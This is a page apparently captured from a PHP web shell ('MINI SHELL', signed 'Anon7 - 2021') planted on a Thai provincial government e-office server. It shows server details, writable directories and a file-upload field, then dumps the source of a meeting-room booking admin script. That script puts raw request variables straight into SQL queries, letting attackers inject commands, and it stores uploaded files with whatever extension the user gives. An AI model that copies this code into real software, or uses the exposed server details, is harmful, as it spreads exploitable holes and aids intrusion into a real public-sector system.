MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/meetingroom/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/application/meetingroom/config_room_bk20100302.php
<?
//include("chk_permission.php");
session_start();
include("../../config/config.inc.php");
include("../../common/function.php");
include("var.inc.php");
$phpfile = "config_room.php";
//insert timeQuery
include("../../common/common_system.inc.php"); 
$ApplicationName="meeting"; 
$time_start = getmicrotime();  
//insert timeQuery

################ HARD FIX
$user=$_SESSION[session_staffid];
################
if($_POST) {
	
		list($tmpn,$tmpe)=explode(".",$_FILES['pro_pic']['name']); 
		$pic_name=time().".".$tmpe;
		
		$pic_temp=$_FILES['pro_pic']['tmp_name']; 
		$pic_size=$_FILES['pro_pic']['size']; 
		$pic_type=$_FILES['pro_pic']['type']; 
		$image_path="images/room_image/$pic_name"; 
	
	if($accid) {
		if ($accid=="addnew") {
			$sql = "INSERT INTO meeting_room_accessories(accname,accdetail,accunit) VALUES('$accname','$accdetail','$accunit')";		
#			$sql = "INSERT INTO meeting_room_accessories(rid,accname,accdetail,accunit) VALUES('$rid','$accname','$accdetail','$accunit')";
			$result = mysql_query($sql) or die(mysql_error()); 
			echo "<center><h3>จัดเก็บข้อมูลแล้ว</h3></center>";
			echo "<meta http-equiv='refresh' content='0;url=$PHP_SELF?rid=$rid&xact=editroom'>" ; exit;
		} else {
			$sql = "UPDATE meeting_room_accessories SET accname='$accname',accdetail='$accdetail',accunit='$accunit' WHERE rid='$rid' AND accid='$accid'";
			$result = mysql_query($sql) or die(mysql_error()); 
			echo "<center><h3>จัดเก็บข้อมูลแล้ว</h3></center>";
			echo "<meta http-equiv='refresh' content='0;url=$PHP_SELF?rid=$rid&xact=editroom'>" ; exit;
		}
	}
	elseif(!$rid) {
		
		copy($pic_temp,$image_path);
		$sql = "INSERT INTO meeting_room(rname,rdetail,rfloor,rsize,rrent,rper,admin_only,image) VALUES('$rname','$rdetail','$rfloor','$rsize','$rrent','$rper','$admin_only','$pic_name')";
		$result = mysql_query($sql) or die(mysql_error()); 
		echo "<center><h3>จัดเก็บข้อมูลแล้ว</h3></center>";
		echo "<meta http-equiv='refresh' content='0;url=$PHP_SELF'>" ; exit;
	}
	if ($xact=="editroom") {
		if($pic_size!=0){ 
			$sql="select image from meeting_room where rid='$rid'";
			$query=mysql_query($sql);
			list($image_name)=mysql_fetch_row($query);
			@unlink("images/room_image/".$image_name);
			@copy($pic_temp,$image_path);
			$sql_image=",image='$pic_name'";
		}
		$sql = "UPDATE meeting_room SET rname='$rname',rdetail='$rdetail',rfloor='$rfloor',rsize='$rsize',rrent='$rrent',rper='$rper',admin_only='$admin_only'  $sql_image WHERE rid='$rid'";
		$result = mysql_query($sql) or die(mysql_error()); 
		echo "<center><h3>จัดเก็บข้อมูลแล้ว</h3></center>";
		echo "<meta http-equiv='refresh' content='0;url=$PHP_SELF'>" ; 
		exit;
	}
}
if($xact=="del") {
	$sql="select image from meeting_room where rid='$rid'";
	$query=mysql_query($sql);
	list($image_name)=mysql_fetch_row($query);
	@unlink("images/room_image/".$image_name);
	$sql = "DELETE FROM meeting_room WHERE rid='$delroomid'  ";
	$result = mysql_query($sql) or die($sql  ."<br><br>". __LINE__ ."<br><br>".  mysql_error()); 
	
	$sql = "DELETE FROM meeting_reserve WHERE roomid='$delroomid'  ";
	$result = mysql_query($sql) or die($sql  ."<br><br>". __LINE__ ."<br><br>".  mysql_error()); 
#delroomid=20&xact=del
#	$sql = "DELETE FROM meeting_room_accessories WHERE rid='$rid' AND accid='$accid'   ";
	$sql = "DELETE FROM meeting_room_accessories WHERE rid='$delroomid'   ";
	$result = mysql_query($sql) or die($sql  ."<br><br>". __LINE__ ."<br><br>".  mysql_error()); 	

	echo "<center><h3>ลบข้อมูลแล้ว</h3></center>";
	echo "<meta http-equiv='refresh' content='0;url=$PHP_SELF?rid=$rid'>" ; exit;
}
?>
<html>
<head><title>ระบบจองห้องประชุม</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../../common/style.css" rel="stylesheet" type="text/css">
<link href="../../common/tab_style.css" rel="stylesheet" type="text/css" />
<link rel="stylesheet" href="css/lightbox.css" type="text/css" media="screen" />

<script type="text/javascript" src="js/prototype.js"></script>
<script type="text/javascript" src="js/scriptaculous.js?load=effects,builder"></script>
<script type="text/javascript" src="js/lightbox.js"></script>

<script language="javascript" src="../../common/popcalendar.js"></script>
<script language="javascript" src="../../common/xmlhttp.js"></script>
<script type="text/javascript" src="../../common/tabber.js"></script>
<script type="text/javascript"  >
function   chk_confirm(name01) {
	if (!(confirm("ไม่สามารถกู้คืนได้เมื่อลบรายการ"+ name01 +" \n เลือก OK เพื่อยืนยันการลบ"))){
		return false; 
	}
}	   // END function   chk_confirm_person(name01) { 



function noNumbers(e)
{
	var keynum;
	var keychar;
	var numcheck;
	
	if(window.event) // IE
		{
		keynum = e.keyCode;
		}
	else if(e.which) // Netscape/Firefox/Opera
		{
		keynum = e.which;
		}
	keychar = String.fromCharCode(keynum);
	numcheck = /\d/;
	return numcheck.test(keychar);
}



</script>
<style type="text/css">
<!--
.style1 {color: #FF0000}
-->
</style>
</head>
<body topmargin="0" bgcolor="#EFEFEF">
<? 			 	
$title_label = "ห้องประชุม";
include "header.php";
$nowaction = "xconfig" ; 
include "menu_bar.php";  
if ($xact=="") {
?>
    <table width="100%" border="0" cellpadding="0" cellspacing="0" bgcolor="#EFEFEF">
      <tr>
        <td align="center" valign="top"><br>
		<? if ($rid == ""){ ?>
		<table width="96%" border="0" align="center" cellpadding="0" cellspacing="0">
            <tr>
              <td><a href="<?=$phpfile?>?xact=newroom" target="_self">เพิ่มรายชื่อห้อง</a></td>
            </tr>
          </table>
          <table width="96%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#999999"    >
		   <tr align="center" bgcolor="#466A8E" class="headerTB_white" >
			 <td width="7%" height="25">ลำดับ   </td>	
            <td width="7%" height="25">&nbsp;     </td>				 
			  <td width="34%" height="25" bgcolor="#466A8E"> ชื่อห้อง  </td>	
            <td width="9%" height="25">ชั้น   </td>	
            <td width="11%" height="25">ค่าเช่าห้อง</td>				
            <td width="32%" height="25">รายละเอียด   </td>	
			</tr>
<?
$sql = " SELECT  rid,rname,rdetail,rfloor,rsize,rrent,rper,admin_only FROM  meeting_room  ";
$result = mysql_query($sql) ; 
while ($rs= mysql_fetch_assoc($result)){ 
$nonm++; 
if ($bgcolor1 == "DDDDDD"){  $bgcolor1 = "EFEFEF"  ; } else {$bgcolor1 = "DDDDDD" ;}
?>		
           <tr align="center" bgcolor="#<?=$bgcolor1?>">
		    <td height="25"><?=$nonm?></td>	
            <td>
			<a href='config_room.php?rid=<?=$rs[rid]?>&xact=editroom' target=_self><img src="../../images/b_edit.png" width="16" height="16" border="0"></a> 
			
			<a href="config_room.php?delroomid=<?=$rs[rid]?>&xact=del" onClick="return  chk_confirm('<?=$rs[rname]?>');  " ><img src="../../images/b_drop.png" width="16" height="16" border="0"></a> </td>			
            <td align="left"><?
            echo " <a href='config_room.php?rid=$rs[rid]&xact=editroom' target=_self>$rs[rname]</a> "; 
			
?>    </td>	
            <td><?=$rs[rfloor]?>&nbsp;</td>	
            <td><?=$rs[rrent]?>&nbsp;บาท/<? if($rs[rper]==0){echo"ชั่วโมง";}elseif($rs[rper]==1){echo"วัน";}?></td>	
            <td align="left"><?=$rs[rdetail]?>&nbsp;     </td>				
          </tr>
<?
} ### END while ($rs= mysql_fetch_assoc($result)){   
?>	 		  
        </table>
<?
} } elseif(($xact=="editroom")||($xact=="newroom")) { 
$sql = " SELECT rid,rname,rdetail,rfloor,rsize,rrent,admin_only,image  FROM  meeting_room   where rid = $rid  ";
$result = mysql_query($sql) ; 
$rs = @mysql_fetch_assoc($result) ; 
?>

<form name="form1" method="post" action="<?=$phpfile?>"  enctype="multipart/form-data">
  <table width="66%" border="0" align="center" cellpadding="2" cellspacing="0">
    <tr>
      <td bgcolor="#466A8E" class="headerTB_white"><span class="headerTB">ข้อมูลห้องประชุม
        <?=$rs[rname]?>
      </span></td>
    </tr>
    <tr>
      <td bgcolor="#999999"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
          <tr>
            <td height="20" align="right">&nbsp;</td>
            <td height="20">&nbsp;
                <?
				echo $msg_return ; 
				$msg_return = "";
				?>            </td>
          </tr>
          <tr>
          <td height="20" align="right">&nbsp;</td>
          <?php
		  	$show_image=$rs[image]==""?"no_image.jpg":$rs[image];
		  ?>
             <td height="20" align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
             <a href="images/room_image/<?php echo $show_image;	?>" rel="lightbox" title="">
             <img src="images/room_image/<?php echo $show_image;	?>" width="150px" style="border:#000 solid 2px" /> 
             </a>
             <br /><br />
             </td>
          </tr>
          <tr>
            <td height="20" align="right">ชื่อห้องประชุม : </td>
            <td height="20"><input name="rname" type="text" value="<?=$rs[rname]?>" size="46">
              <span class="style1">*</span>            </td>
          </tr>
          <tr>
            <td width="27%" height="20" align="right">ชั้น : </td>
            <td width="73%" height="20"><input name="rfloor" type="text" value="<?=$rs[rfloor]?>" size="46" onKeyPress="return noNumbers(event)" >
              <span class="style1">*</span>            </td>
          </tr>
          <tr>
            <td height="20" align="right">ขนาดความจุของห้อง : </td>
            <td height="20"><input name="rsize" type="text" value="<?=$rs[rsize]?>" size="46" onKeyPress="return noNumbers(event)" >
              คน   <span class="style1">*</span></td>
          </tr>
          <tr>
            <td height="20" align="right">ค่าเช่าห้อง : </td>
            <td height="20"><input name="rrent" type="text" id="rrent" value="<?=$rs[rrent]?>" size="26" onKeyPress="return noNumbers(event)" >
              บาท ต่อ 
                <select name="rper" id="rper" style="width:70px;">
                  <option value="0">ชั่วโมง</option>
                  <option value="1">วัน</option> 
				  <option value="2">ครั้ง</option>
                </select>   <span class="style1">*</span>                </td>
          </tr>
            <tr>
            <td height="20" align="right">รูปภาพ : </td>
            <td height="20"><input type="file" style="width:235px;" name="pro_pic" /></td>
          </tr>
          <tr>
            <td height="20" align="right">เฉพาะผู้ดูแลระบบ : </td>
            <td height="20" valign="top"><input name="admin_only" type="checkbox" id="admin_only" value="1" <? if($rs[admin_only]==1){?>checked="checked"<? } ?>>
              สามารถจองได้เฉพาะผู้ดูแลระบบเท่านั้น </td>
          </tr>
          <tr>
            <td height="20" align="right">รายละเอียด :</td>
            <td height="20" valign="top"><textarea name="rdetail" cols="45" rows="5"><?=$rs[rdetail]?></textarea></td>
          </tr>
          <tr>
            <td height="20" colspan="2" align="center">
				<input name="rid" type="hidden" id="rid" value="<?=$rid?>">
				<input name="xact" type="hidden" id="xact" value="<?=$xact?>">
                <input name="update_data" type="submit" id="update_data" value="บันทึก">
              &nbsp;
              <input type="button" name="Submit2" value="กลับหน้าหลัก" onClick="window.location='<?=$phpfile?>'"></td>
          </tr>
          <tr>
            <td height="20" colspan="2">&nbsp;</td>
          </tr>
      </table></td>
    </tr>
  </table>
</form>


<br>
<br>
<table width="66%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#999999"    >
  <tr align="center" bgcolor="#466A8E" class="headerTB_white" >
    <td height="20" colspan="6"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
      <tr>
        <td height="20" class="headerTB_white">รายการโสตทัศนวัสดุ</td>
        <td height="20" align="right"><a href="?rid=<?=$rid?>&accid=addnew">เพิ่มรายการใหม่</a></td>
        </tr>

    </table></td>
    </tr>
	<tr align="center" bgcolor="#466A8E" class="headerTB_white" >
		<td width="7%" height="20">ลำดับ   </td>	
		<td width="7%" height="20">&nbsp;     </td>				 
		<td width="34%" height="20" bgcolor="#466A8E"> ชื่ออุปกรณ์</td>	
		<td width="9%" height="20">จำนวน</td>	
	</tr>
	<?
	$sql = " SELECT * FROM meeting_room_accessories WHERE rid='$rid'";
	$result = mysql_query($sql) ; 
	$nrows = mysql_num_rows($result);
	if ($nrows) {
		while ($rs= mysql_fetch_assoc($result)){ 
		$nonm++; 
		if ($bgcolor1 == "DDDDDD"){  $bgcolor1 = "EFEFEF"  ; } else {$bgcolor1 = "DDDDDD" ;} ?>		
		   <tr align="center" bgcolor="#<?=$bgcolor1?>">
				<td height="25"><?=$nonm?></td>	
				<td><a href='<?=$PHP_SELF;?>?rid=<?=$rs[rid]?>&accid=<?=$rs[accid]?>' target=_self><img src="../../images/b_edit.png" width="16" height="16" border="0"></a>&nbsp;<a href="<?=$PHP_SELF;?>?rid=<?=$rs[rid]?>&accid=<?=$rs[accid]?>&xact=del" onClick="return  chk_confirm('<?=$rs[accname]?>');  " ><img src="../../images/b_drop.png" width="16" height="16" border="0"></a></td>
			 <td align="left">&nbsp;<a href="?rid=<?=$rid;?>&accid=<?=$rs[accid];?>"><?=$rs[accname];?></a></td>	
				<td><?=$rs[accunit]?>&nbsp;</td>	
		  </tr>
		<? } } else { ?>
		<tr>
		  <td height="25" colspan="6" align="center" bgcolor="<?=$bgcolor1;?>"><strong>ไม่พบข้อมูล</strong></td>
		</tr>
		<? } ?>
        </table>
		
		<? } if (($rid)&&($accid)) { 
			if ($accid!="addnew") {
				$sql = " SELECT * FROM meeting_room_accessories WHERE rid='$rid' AND accid='$accid'";
				$result = mysql_query($sql); 
				$rs = mysql_fetch_assoc($result);
			}
		?>
	<form name="form1" method="post" action="">
  <table width="66%" border="0" align="center" cellpadding="2" cellspacing="0">
    <tr>
      <td bgcolor="#466A8E" class="headerTB_white"><span class="headerTB">ข้อมูลโสตทัศนวัสดุ</span></td>
    </tr>
    <tr>
      <td bgcolor="#999999"><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
          <tr>
            <td width="27%" align="right">&nbsp;</td>
            <td width="73%">&nbsp;            </td>
          </tr>
          <tr>
            <td height="19" align="right">ชื่ออุปกรณ์ : </td>
            <td><input name="accname" type="text" id="accname" value="<?=$rs[accname]?>" size="46">
              <span class="style1">*</span></td>
          </tr>
          <tr>
            <td align="right">รายละเอียด :</td>
            <td><textarea name="accdetail" cols="45" rows="5" id="accdetail"><?=$rs[accdetail];?></textarea>
              <span class="style1">*</span></td>
          </tr>
          <tr>
            <td align="right">จำนวน : </td>
            <td><input name="accunit" type="text" id="accunit" value="<?=$rs[accunit]?>" size="40"> 
              ชิ้น   <span class="style1">*</span></td>
          </tr>
          <tr>
            <td colspan="2" align="center"><input name="rid" type="hidden" id="rid" value="<?=$rid;?>">
              <input name="accid" type="hidden" id="accid" value="<?=$accid;?>">
              <input name="xact" type="hidden" id="xact" value="<?=$xact;?>">
                <input name="update_data" type="submit" id="update_data" value="บันทึก">&nbsp;
              <input type="button" name="Submit2" value="กลับหน้าหลัก" onClick="window.location='<?=$phpfile;?>'"></td>
          </tr>
          <tr>
            <td colspan="2">&nbsp;</td>
          </tr>
      </table></td>
    </tr>
  </table>
</form>
<? } ?>

      </tr>
</table>
</body>
</html>
<?
//insert timeQuery
 $time_end = getmicrotime();
  writetime2db($timestart,$timeend);
//insert timeQuery
?>

Anon7 - 2021